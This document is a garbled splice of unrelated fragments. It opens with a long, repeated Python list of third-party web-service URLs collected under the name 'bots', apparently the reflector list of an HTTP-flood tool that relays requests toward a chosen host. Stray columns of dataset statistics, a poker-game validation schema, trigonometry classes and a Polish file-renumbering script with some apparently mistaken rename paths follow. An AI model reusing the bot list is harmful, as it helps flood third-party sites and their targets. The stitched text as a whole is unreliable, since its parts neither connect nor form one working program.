bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
| 60.021837
| 85
| 0.72212
| 13,632
| 93,454
| 4.930238
| 0.005722
| 0.213067
| 0.298293
| 0.22372
| 0.993885
| 0.993513
| 0.993513
| 0.993513
| 0.993513
| 0.993513
| 0
| 0.003218
| 0.045798
| 93,454
| 1,556
| 86
| 60.060411
| 0.750454
| 0
| 0
| 0.959871
| 0
| 0
| 0.723237
| 0.00654
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.003884
| null | null | 0.031715
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
26f8cdc1c3609a8e28c8d8d4336c820dd7ceb09f
| 2,432
|
py
|
Python
|
source/schemas/game.py
|
julio9246/hg-poker-api
|
56805601bc26bf8bb80e05235ae22a59a174af09
|
[
"Apache-2.0"
] | null | null | null |
source/schemas/game.py
|
julio9246/hg-poker-api
|
56805601bc26bf8bb80e05235ae22a59a174af09
|
[
"Apache-2.0"
] | null | null | null |
source/schemas/game.py
|
julio9246/hg-poker-api
|
56805601bc26bf8bb80e05235ae22a59a174af09
|
[
"Apache-2.0"
] | null | null | null |
from source.schemas.validation import Validation
class GameSchema(Validation):
    """Validation schemas for game payloads (create and update)."""

    @staticmethod
    def save():
        """Schema for creating a game; ids, dates and flags are mandatory."""
        def int_rule(required):
            # Non-negative integer field.
            return {
                'min': 0,
                'nullable': False,
                'required': required,
                'type': 'integer'
            }

        def nonempty_rule(kind, required):
            # Non-empty, non-null value of the given type.
            return {
                'empty': False,
                'nullable': False,
                'required': required,
                'type': kind
            }

        return {
            'tournament_id': int_rule(True),
            'game_number': int_rule(True),
            'localization': {
                'nullable': False,
                'required': False,
                'type': 'string'
            },
            'date_start': nonempty_rule('string', True),
            'date_end': nonempty_rule('string', False),
            'qtd_rebuy_limit': int_rule(True),
            'active': nonempty_rule('boolean', True)
        }

    @staticmethod
    def update():
        """Schema for updating a game; only date_start stays mandatory."""
        def int_rule(required):
            # Non-negative integer field.
            return {
                'min': 0,
                'nullable': False,
                'required': required,
                'type': 'integer'
            }

        def nonempty_rule(kind, required):
            # Non-empty, non-null value of the given type.
            return {
                'empty': False,
                'nullable': False,
                'required': required,
                'type': kind
            }

        return {
            'game_number': int_rule(False),
            'localization': {
                'nullable': False,
                'required': False,
                'type': 'string'
            },
            'date_start': nonempty_rule('string', True),
            'date_end': nonempty_rule('string', False),
            'qtd_rebuy_limit': int_rule(False),
            'active': nonempty_rule('boolean', False)
        }
| 26.725275
| 48
| 0.331414
| 141
| 2,432
| 5.638298
| 0.248227
| 0.212579
| 0.343396
| 0.228931
| 0.816352
| 0.816352
| 0.816352
| 0.769811
| 0.513208
| 0.513208
| 0
| 0.004496
| 0.542763
| 2,432
| 90
| 49
| 27.022222
| 0.710432
| 0
| 0
| 0.767442
| 0
| 0
| 0.216694
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| true
| 0
| 0.011628
| 0.023256
| 0.05814
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
f82c2979f02cabeca3d3824b1ca1f25896b37e5e
| 156
|
py
|
Python
|
automl_toolbox/model_selection/__init__.py
|
farrajota/automl_toolbox
|
2a06e888f8f09ee963cde0ea1b993ee30743ec45
|
[
"MIT"
] | null | null | null |
automl_toolbox/model_selection/__init__.py
|
farrajota/automl_toolbox
|
2a06e888f8f09ee963cde0ea1b993ee30743ec45
|
[
"MIT"
] | null | null | null |
automl_toolbox/model_selection/__init__.py
|
farrajota/automl_toolbox
|
2a06e888f8f09ee963cde0ea1b993ee30743ec45
|
[
"MIT"
] | null | null | null |
"""
Methods and functions to fit and cross-validate models on data.
"""
from .cross_validation import cross_validation_score, cross_validation_score_iter
| 22.285714
| 81
| 0.814103
| 22
| 156
| 5.5
| 0.681818
| 0.371901
| 0.330579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121795
| 156
| 6
| 82
| 26
| 0.883212
| 0.403846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f82c7087f290895ff34d3296562f3bb0171216a7
| 137
|
py
|
Python
|
src/configflow/io/__init__.py
|
volodymyrPivoshenko/configflow
|
2158c8395c4913b836c2a27e38c51f5ec519323b
|
[
"MIT"
] | 8
|
2022-01-25T09:06:34.000Z
|
2022-03-28T14:55:45.000Z
|
src/configflow/io/__init__.py
|
volodymyrPivoshenko/configflow
|
2158c8395c4913b836c2a27e38c51f5ec519323b
|
[
"MIT"
] | 23
|
2022-01-23T15:15:00.000Z
|
2022-03-28T21:47:15.000Z
|
src/configflow/io/__init__.py
|
volodymyrPivoshenko/configflow
|
2158c8395c4913b836c2a27e38c51f5ec519323b
|
[
"MIT"
] | 1
|
2022-03-15T21:08:19.000Z
|
2022-03-15T21:08:19.000Z
|
"""Package for the IO functionality."""
from configflow.io import dotenv
from configflow.io import ini
from configflow.io import loader
| 22.833333
| 39
| 0.79562
| 20
| 137
| 5.45
| 0.55
| 0.385321
| 0.440367
| 0.605505
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131387
| 137
| 5
| 40
| 27.4
| 0.915966
| 0.240876
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f84d2341d82f27e92e13024bb7a3aebc2237c41b
| 2,328
|
py
|
Python
|
cake/functions/basic/trig.py
|
polo-sec/Cake
|
ab3ae8e53b9399ee011f77d6b6e918762e52da78
|
[
"MIT"
] | null | null | null |
cake/functions/basic/trig.py
|
polo-sec/Cake
|
ab3ae8e53b9399ee011f77d6b6e918762e52da78
|
[
"MIT"
] | 1
|
2021-10-10T16:41:01.000Z
|
2021-10-10T16:41:01.000Z
|
cake/functions/basic/trig.py
|
polo-sec/Cake
|
ab3ae8e53b9399ee011f77d6b6e918762e52da78
|
[
"MIT"
] | null | null | null |
# Trigonometric functions
from ..base import Function
import cake
import typing
import math
__all__ = ("Sin", "Cos", "Tan")
class Sin(Function):
    """Sine of a value.

    ``type`` names the angular unit of the *input*: ``"radians"``
    (default) or ``"degrees"``.
    """

    def __init__(self, value, *, type: str = "radians") -> None:
        super().__init__(value, name="sin")
        self.type = type

    def _raw_exec(self, other) -> typing.Any:
        """Evaluate ``sin(other)``, unwrapping cake value types first."""
        if isinstance(other, cake.Unknown):
            # Cannot evaluate an unknown yet: record this function class
            # on a copy's pending-function list and return it.
            unknown = other.copy()
            unknown.data['functions'].append(self.__class__)
            return unknown
        if hasattr(other, 'value'):
            other = other.value
        if hasattr(other, 'get_value'):
            other = other.get_value()
        # BUGFIX: the old code did ``getattr(math, self.type)(other)``,
        # which ran ``math.radians`` on input that was *already* in
        # radians (the default) and ``math.degrees`` on degree input.
        # ``math.sin`` expects radians, so only degree input needs
        # converting; any other unit name passes through unchanged.
        if self.type == "degrees":
            val = math.radians(other)
        else:
            val = other
        return cake.convert_type(math.sin(val))
class Cos(Function):
    """Cosine of a value.

    ``type`` names the angular unit of the *input*: ``"radians"``
    (default) or ``"degrees"``.
    """

    def __init__(self, value, *, type: str = "radians") -> None:
        super().__init__(value, name="cos")
        self.type = type

    def _raw_exec(self, other) -> typing.Any:
        """Evaluate ``cos(other)``, unwrapping cake value types first."""
        if isinstance(other, cake.Unknown):
            # Cannot evaluate an unknown yet: record this function class
            # on a copy's pending-function list and return it.
            unknown = other.copy()
            unknown.data['functions'].append(self.__class__)
            return unknown
        if hasattr(other, 'value'):
            other = other.value
        if hasattr(other, 'get_value'):
            other = other.get_value()
        # BUGFIX: the old code did ``getattr(math, self.type)(other)``,
        # which ran ``math.radians`` on input that was *already* in
        # radians (the default) and ``math.degrees`` on degree input.
        # ``math.cos`` expects radians, so only degree input needs
        # converting; any other unit name passes through unchanged.
        if self.type == "degrees":
            val = math.radians(other)
        else:
            val = other
        return cake.convert_type(math.cos(val))
class Tan(Function):
    """Tangent of a value.

    ``type`` names the angular unit of the *input*: ``"radians"``
    (default) or ``"degrees"``.
    """

    def __init__(self, value, *, type: str = "radians") -> None:
        super().__init__(value, name="tan")
        self.type = type

    def _raw_exec(self, other) -> typing.Any:
        """Evaluate ``tan(other)``, unwrapping cake value types first."""
        if isinstance(other, cake.Unknown):
            # Cannot evaluate an unknown yet: record this function class
            # on a copy's pending-function list and return it.
            unknown = other.copy()
            unknown.data['functions'].append(self.__class__)
            return unknown
        if hasattr(other, 'value'):
            other = other.value
        if hasattr(other, 'get_value'):
            other = other.get_value()
        # BUGFIX: the old code did ``getattr(math, self.type)(other)``,
        # which ran ``math.radians`` on input that was *already* in
        # radians (the default) and ``math.degrees`` on degree input.
        # ``math.tan`` expects radians, so only degree input needs
        # converting; any other unit name passes through unchanged.
        if self.type == "degrees":
            val = math.radians(other)
        else:
            val = other
        return cake.convert_type(math.tan(val))
| 26.758621
| 64
| 0.574313
| 256
| 2,328
| 5.007813
| 0.167969
| 0.037442
| 0.065523
| 0.044462
| 0.891576
| 0.891576
| 0.891576
| 0.891576
| 0.891576
| 0.891576
| 0
| 0
| 0.306271
| 2,328
| 86
| 65
| 27.069767
| 0.793808
| 0.00988
| 0
| 0.774194
| 0
| 0
| 0.046895
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096774
| false
| 0
| 0.064516
| 0
| 0.306452
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f8849861845d29d47b15975daf849c46112620bb
| 21,432
|
py
|
Python
|
check_files_numeration_p31.py
|
mcjczapiewski/work
|
2540afa6b18bf6ff92a7c07b16695035785c0dd8
|
[
"MIT"
] | null | null | null |
check_files_numeration_p31.py
|
mcjczapiewski/work
|
2540afa6b18bf6ff92a7c07b16695035785c0dd8
|
[
"MIT"
] | null | null | null |
check_files_numeration_p31.py
|
mcjczapiewski/work
|
2540afa6b18bf6ff92a7c07b16695035785c0dd8
|
[
"MIT"
] | null | null | null |
# Renumbers scanned document files inside every subdirectory of a
# user-supplied folder so their sequence numbers become consecutive, in
# four passes per directory: (1) PDFs by sequence number, (2) PDFs by
# per-document-type counter, (3) .TXT/.KCD/.DXF/.DWG by sequence number,
# (4) the same extensions by per-extension counter. Rename collisions are
# dodged via temporary "aaa"/"bbb" name markers that are stripped after
# each pass; unrecoverable failures are appended to bledy.txt in the root
# folder. Console messages and name fragments are Polish
# ("operat" = survey report, "tom" = volume, "myslnik" = hyphen).
import os
import regex
from natsort import natsorted, natsort_keygen
nkey = natsort_keygen()
count = 1
print(
    "\nUWAGA! W folderze, we wskazanej przez użytkownika lokalizacji,\n\
może pojawić się plik bledy.txt!\n\n"
)
sciezka = input("Podaj ścieżkę do folderu: ")
# Walk every subdirectory of the chosen root and renumber its files.
for subdir, dirs, files in os.walk(sciezka):
    dirs.sort(key=nkey)
    aa = set()
    bb = set()
    # Skip directories that contain no PDF at all.
    if not any(fname.upper().endswith(".PDF") for fname in os.listdir(subdir)):
        continue
    kolejny = 1
    # Pass 1: rename PDFs so sequence numbers run 1, 2, 3, ... in
    # natural-sort order.
    for file in natsorted(files):
        if file.upper().endswith(".PDF"):
            # Drop the directory-name prefix from the file name.
            bez_ope = file.split(os.path.basename(subdir))[1]
            nr_tomu = myslnik = 0
            if regex.match(r"^.T.+", bez_ope):
                # A "T..." segment marks a volume ("tom"); peel it off
                # before reading the sequence number.
                nr_tomu = 1
                tom = regex.match(r"^.(T.*?)(_[1-9]|-[1-9])", bez_ope)[1]
                bez_ope = regex.match(
                    r"^.T.*?((_[1-9].+$)|-[1-9].+$)", bez_ope
                )[1]
            if bez_ope.startswith("-"):
                myslnik = 1
                numer = int(bez_ope.split("-", 1)[1].split("-")[0])
            else:
                numer = int(bez_ope.split("_")[1].split("-")[0])
            # Only rename when the embedded number differs from the
            # expected consecutive value.
            if not numer == kolejny:
                print(str(count) + "\t" + file)
                count += 1
                plik = os.path.join(subdir, file)
                # Rebuild the "<dir>[separator][tom]" prefix, keeping the
                # original separator style.
                if nr_tomu == 1:
                    if regex.match(
                        os.path.basename(subdir) + "-T[0-9].+", file
                    ):
                        operat = os.path.basename(subdir) + "-" + tom + "_"
                    elif myslnik == 1:
                        operat = os.path.basename(subdir) + "_" + tom + "-"
                    else:
                        operat = os.path.basename(subdir) + "_" + tom + "_"
                else:
                    operat = os.path.basename(subdir) + "_"
                if (
                    regex.match(os.path.basename(subdir) + "-T[0-9].+", file)
                    or myslnik == 1
                ):
                    dokument = "-" + file.split("-", 2)[2]
                else:
                    dokument = "-" + file.split("-", 1)[1]
                nazwa = os.path.join(subdir, operat + str(kolejny) + dokument)
                # Try the direct rename; on collision fall back to an
                # "aaa" (then "bbb") marker name, else log to bledy.txt.
                try:
                    os.rename(plik, nazwa)
                except:
                    try:
                        aa_nazwa = os.path.join(
                            subdir, operat + str(kolejny) + "aaa" + dokument
                        )
                        os.rename(plik, aa_nazwa)
                        aa.add(aa_nazwa)
                    except:
                        try:
                            bb_nazwa = os.path.join(
                                subdir,
                                operat + str(kolejny) + "bbb" + dokument,
                            )
                            os.rename(plik, bb_nazwa)
                            bb.add(bb_nazwa)
                        except:
                            with open(
                                os.path.join(sciezka, "bledy.txt"), "a"
                            ) as bl:
                                bl.write(
                                    plik
                                    + "\t"
                                    + nazwa
                                    + "\tNie udało się zmienić nazwy pliku.\n"
                                )
                # Keep the sidecar .wkt file (only for selected document
                # types) in sync with the renamed PDF.
                wkt = os.path.join(subdir, os.path.splitext(file)[0] + ".wkt")
                if os.path.exists(wkt) and any(
                    i in wkt for i in (("SZK-POL", "M-WYN", "M-WYW", "M-UZ"))
                ):
                    print(str(count) + "\t" + os.path.basename(wkt))
                    count += 1
                    try:
                        os.rename(wkt, os.path.splitext(nazwa)[0] + ".wkt")
                    except:
                        # NOTE(review): these fallback branches rename
                        # ``plik`` (the PDF path) instead of ``wkt`` —
                        # looks like a copy/paste slip; confirm intent.
                        try:
                            aa_nazwa = os.path.join(
                                subdir,
                                operat
                                + str(kolejny)
                                + "aaa"
                                + os.path.splitext(dokument)[0]
                                + ".wkt",
                            )
                            os.rename(plik, aa_nazwa)
                            aa.add(aa_nazwa)
                        except:
                            try:
                                bb_nazwa = os.path.join(
                                    subdir,
                                    operat
                                    + str(kolejny)
                                    + "bbb"
                                    + os.path.splitext(dokument)[0]
                                    + ".wkt",
                                )
                                os.rename(plik, bb_nazwa)
                                bb.add(bb_nazwa)
                            except:
                                with open(
                                    os.path.join(sciezka, "bledy.txt"), "a"
                                ) as bl:
                                    bl.write(
                                        wkt
                                        + "\t"
                                        + os.path.splitext(nazwa)[0]
                                        + ".wkt"
                                        + "\tNie udało się zmienić \
nazwy pliku.\n"
                                    )
            kolejny += 1
    # Strip the temporary "aaa"/"bbb" collision markers added above.
    for i in aa:
        try:
            os.rename(i, i.split("aaa")[0] + i.split("aaa")[1])
        except:
            with open(os.path.join(sciezka, "bledy.txt"), "a") as bl:
                bl.write(
                    i
                    + "\t"
                    + i.split("aaa")[0]
                    + i.split("aaa")[1]
                    + "\tNie udało się zmienić nazwy pliku.\n"
                )
    for i in bb:
        try:
            os.rename(i, i.split("bbb")[0] + i.split("bbb")[1])
        except:
            with open(os.path.join(sciezka, "bledy.txt"), "a") as bl:
                bl.write(
                    i
                    + "\t"
                    + i.split("bbb")[0]
                    + i.split("bbb")[1]
                    + "\tNie udało się zmienić nazwy pliku.\n"
                )
    aa = set()
    bb = set()
    duble = {}
    # Pass 2: renumber PDFs sharing the same document-type code ("typ")
    # so the trailing zero-padded counter runs 001, 002, ...
    for _, _, files in os.walk(subdir):
        for file in natsorted(files):
            if file.upper().endswith(".PDF"):
                nazwa = file.split(os.path.basename(subdir))[1]
                typ = regex.match(
                    r".+?([A-Z].*[A-Z])", str(os.path.splitext(nazwa)[0])
                )[1]
                if typ not in duble:
                    duble[typ] = 1
                elif typ in duble:
                    do_tego = duble[typ]
                    do_tego += 1
                    duze_litery = file.upper()
                    pierwotna = regex.match(r"^.+-(.+)\.PDF", duze_litery)[
                        1
                    ].zfill(3)
                    if not str(pierwotna) == str(do_tego).zfill(3):
                        print(str(count) + "\t" + file)
                        count += 1
                        bylo = file.split(pierwotna)[0]
                        rozszerzenie = os.path.splitext(file)[1]
                        bedzie = bylo + str(do_tego).zfill(3) + rozszerzenie
                        try:
                            os.rename(
                                os.path.join(subdir, file),
                                os.path.join(subdir, bedzie),
                            )
                        except:
                            try:
                                aa_nazwa = os.path.join(
                                    subdir,
                                    bylo
                                    + "aaa"
                                    + str(do_tego).zfill(3)
                                    + rozszerzenie,
                                )
                                os.rename(plik, aa_nazwa)
                                aa.add(aa_nazwa)
                            except:
                                try:
                                    bb_nazwa = os.path.join(
                                        subdir,
                                        bylo
                                        + "bbb"
                                        + str(do_tego).zfill(3)
                                        + rozszerzenie,
                                    )
                                    os.rename(plik, bb_nazwa)
                                    bb.add(bb_nazwa)
                                except:
                                    with open(
                                        os.path.join(sciezka, "bledy.txt"), "a"
                                    ) as bl:
                                        bl.write(
                                            os.path.join(subdir, file)
                                            + "\t"
                                            + os.path.join(subdir, bedzie)
                                            + "\tNie udało się zmienić \
nazwy pliku.\n"
                                        )
                        # Rename any matching .wkt sidecar too.
                        wkt = os.path.join(
                            subdir, os.path.splitext(file)[0] + ".wkt"
                        )
                        if os.path.exists(wkt):
                            print(str(count) + "\t" + os.path.basename(wkt))
                            count += 1
                            rozszerzenie = ".wkt"
                            bedzie = (
                                bylo + str(do_tego).zfill(3) + rozszerzenie
                            )
                            try:
                                os.rename(wkt, os.path.join(subdir, bedzie))
                            except:
                                try:
                                    aa_nazwa = os.path.join(
                                        subdir,
                                        bylo
                                        + "aaa"
                                        + str(do_tego).zfill(3)
                                        + rozszerzenie,
                                    )
                                    os.rename(plik, aa_nazwa)
                                    aa.add(aa_nazwa)
                                except:
                                    try:
                                        bb_nazwa = os.path.join(
                                            subdir,
                                            bylo
                                            + "bbb"
                                            + str(do_tego).zfill(3)
                                            + rozszerzenie,
                                        )
                                        os.rename(plik, bb_nazwa)
                                        bb.add(bb_nazwa)
                                    except:
                                        with open(
                                            os.path.join(sciezka, "bledy.txt"),
                                            "a",
                                        ) as bl:
                                            bl.write(
                                                wkt
                                                + "\t"
                                                + os.path.join(subdir, bedzie)
                                                + "\tNie udało się zmienić \
nazwy pliku.\n"
                                            )
                    duble[typ] = do_tego
    # Strip the temporary "aaa"/"bbb" collision markers from pass 2.
    for i in aa:
        try:
            os.rename(i, i.split("aaa")[0] + i.split("aaa")[1])
        except:
            with open(os.path.join(sciezka, "bledy.txt"), "a") as bl:
                bl.write(
                    i
                    + "\t"
                    + i.split("aaa")[0]
                    + i.split("aaa")[1]
                    + "\tNie udało się zmienić nazwy pliku.\n"
                )
    for i in bb:
        try:
            os.rename(i, i.split("bbb")[0] + i.split("bbb")[1])
        except:
            with open(os.path.join(sciezka, "bledy.txt"), "a") as bl:
                bl.write(
                    i
                    + "\t"
                    + i.split("bbb")[0]
                    + i.split("bbb")[1]
                    + "\tNie udało się zmienić nazwy pliku.\n"
                )
    aa = set()
    bb = set()
    # Pass 3: the same consecutive renumbering for .TXT/.KCD/.DXF/.DWG.
    # NOTE(review): ``kolejny`` is not reset to 1 before this pass — it
    # continues from pass 1's final value; confirm that is intentional.
    for _, _, files in os.walk(subdir):
        for file in natsorted(files):
            if file.upper().endswith((".TXT", ".KCD", ".DXF", ".DWG")):
                bez_ope = file.split(os.path.basename(subdir))[1]
                nr_tomu = myslnik = 0
                if regex.match(r"^.T.+", bez_ope):
                    nr_tomu = 1
                    tom = regex.match(r"^.(T.*?)(_[1-9]|-[1-9])", bez_ope)[1]
                    bez_ope = regex.match(
                        r"^.T.*?((_[1-9].+$)|-[1-9].+$)", bez_ope
                    )[1]
                if bez_ope.startswith("-"):
                    myslnik = 1
                    numer = int(bez_ope.split("-", 1)[1].split("-")[0])
                else:
                    numer = int(bez_ope.split("_")[1].split("-")[0])
                if not numer == kolejny:
                    print(str(count) + "\t" + file)
                    count += 1
                    plik = os.path.join(subdir, file)
                    if nr_tomu == 1:
                        if regex.match(
                            os.path.basename(subdir) + "-T[0-9].+", file
                        ):
                            operat = os.path.basename(subdir) + "-" + tom + "_"
                        elif myslnik == 1:
                            operat = os.path.basename(subdir) + "_" + tom + "-"
                        else:
                            operat = os.path.basename(subdir) + "_" + tom + "_"
                    else:
                        operat = os.path.basename(subdir) + "_"
                    if (
                        regex.match(
                            os.path.basename(subdir) + "-T[0-9].+", file
                        )
                        or myslnik == 1
                    ):
                        dokument = "-" + file.split("-", 2)[2]
                    else:
                        dokument = "-" + file.split("-", 1)[1]
                    nazwa = os.path.join(
                        subdir, operat + str(kolejny) + dokument
                    )
                    try:
                        os.rename(plik, nazwa)
                    except:
                        try:
                            aa_nazwa = os.path.join(
                                subdir,
                                operat + str(kolejny) + "aaa" + dokument,
                            )
                            os.rename(plik, aa_nazwa)
                            aa.add(aa_nazwa)
                        except:
                            try:
                                bb_nazwa = os.path.join(
                                    subdir,
                                    operat + str(kolejny) + "bbb" + dokument,
                                )
                                os.rename(plik, bb_nazwa)
                                bb.add(bb_nazwa)
                            except:
                                with open(
                                    os.path.join(sciezka, "bledy.txt"), "a"
                                ) as bl:
                                    bl.write(
                                        plik
                                        + "\t"
                                        + nazwa
                                        + "\tNie udało się zmienić \
nazwy pliku.\n"
                                    )
                kolejny += 1
    # Strip the temporary "aaa"/"bbb" collision markers from pass 3.
    for i in aa:
        try:
            os.rename(i, i.split("aaa")[0] + i.split("aaa")[1])
        except:
            with open(os.path.join(sciezka, "bledy.txt"), "a") as bl:
                bl.write(
                    i
                    + "\t"
                    + i.split("aaa")[0]
                    + i.split("aaa")[1]
                    + "\tNie udało się zmienić nazwy pliku.\n"
                )
    for i in bb:
        try:
            os.rename(i, i.split("bbb")[0] + i.split("bbb")[1])
        except:
            with open(os.path.join(sciezka, "bledy.txt"), "a") as bl:
                bl.write(
                    i
                    + "\t"
                    + i.split("bbb")[0]
                    + i.split("bbb")[1]
                    + "\tNie udało się zmienić nazwy pliku.\n"
                )
    aa = set()
    bb = set()
    ponownie = {}
    # Pass 4: per-extension duplicate renumbering for the non-PDF files
    # (the zero-padded trailing counter, like pass 2 but keyed by
    # extension instead of document type).
    for _, _, files in os.walk(subdir):
        for file in natsorted(files):
            if file.upper().endswith((".TXT", ".KCD", ".DXF", ".DWG")):
                nazwa = file.split(os.path.basename(subdir))[1]
                nr_tomu = 0
                if regex.match(r"^.T.+", nazwa):
                    nr_tomu = 1
                    tom = regex.match(r"^.(T.*?)(_[1-9]|-[1-9])", nazwa)[1]
                    nazwa = regex.match(
                        r"^.T.*?((_[1-9].+$)|-[1-9].+$)", nazwa
                    )[1]
                if nazwa.startswith("-"):
                    typ = int(nazwa.split("-")[1])
                else:
                    typ = int(nazwa.split("_")[1].split("-")[0])
                rozszerz = os.path.splitext(nazwa)[1]
                if rozszerz not in ponownie:
                    ponownie[rozszerz] = 1
                    continue
                elif rozszerz in ponownie:
                    do_tego = ponownie[rozszerz]
                    do_tego += 1
                    duze_litery = file.upper()
                    pierwotna = regex.match(
                        r"^.+-(.+)" + rozszerz.upper(), duze_litery
                    )[1].zfill(3)
                    if not str(pierwotna) == str(do_tego).zfill(3):
                        print(str(count) + "\t" + file)
                        count += 1
                        bylo = file.split(pierwotna)[0]
                        rozszerzenie = os.path.splitext(file)[1]
                        bedzie = bylo + str(do_tego).zfill(3) + rozszerzenie
                        try:
                            os.rename(
                                os.path.join(subdir, file),
                                os.path.join(subdir, bedzie),
                            )
                        except:
                            try:
                                aa_nazwa = os.path.join(
                                    subdir,
                                    bylo
                                    + "aaa"
                                    + str(do_tego).zfill(3)
                                    + rozszerzenie,
                                )
                                os.rename(plik, aa_nazwa)
                                aa.add(aa_nazwa)
                            except:
                                try:
                                    bb_nazwa = os.path.join(
                                        subdir,
                                        bylo
                                        + "bbb"
                                        + str(do_tego).zfill(3)
                                        + rozszerzenie,
                                    )
                                    os.rename(plik, bb_nazwa)
                                    bb.add(bb_nazwa)
                                except:
                                    with open(
                                        os.path.join(sciezka, "bledy.txt"), "a"
                                    ) as bl:
                                        bl.write(
                                            os.path.join(subdir, file)
                                            + "\t"
                                            + os.path.join(subdir, bedzie)
                                            + "\tNie udało się zmienić \
nazwy pliku.\n"
                                        )
                    ponownie[rozszerz] = do_tego
    # Strip the temporary "aaa"/"bbb" collision markers from pass 4.
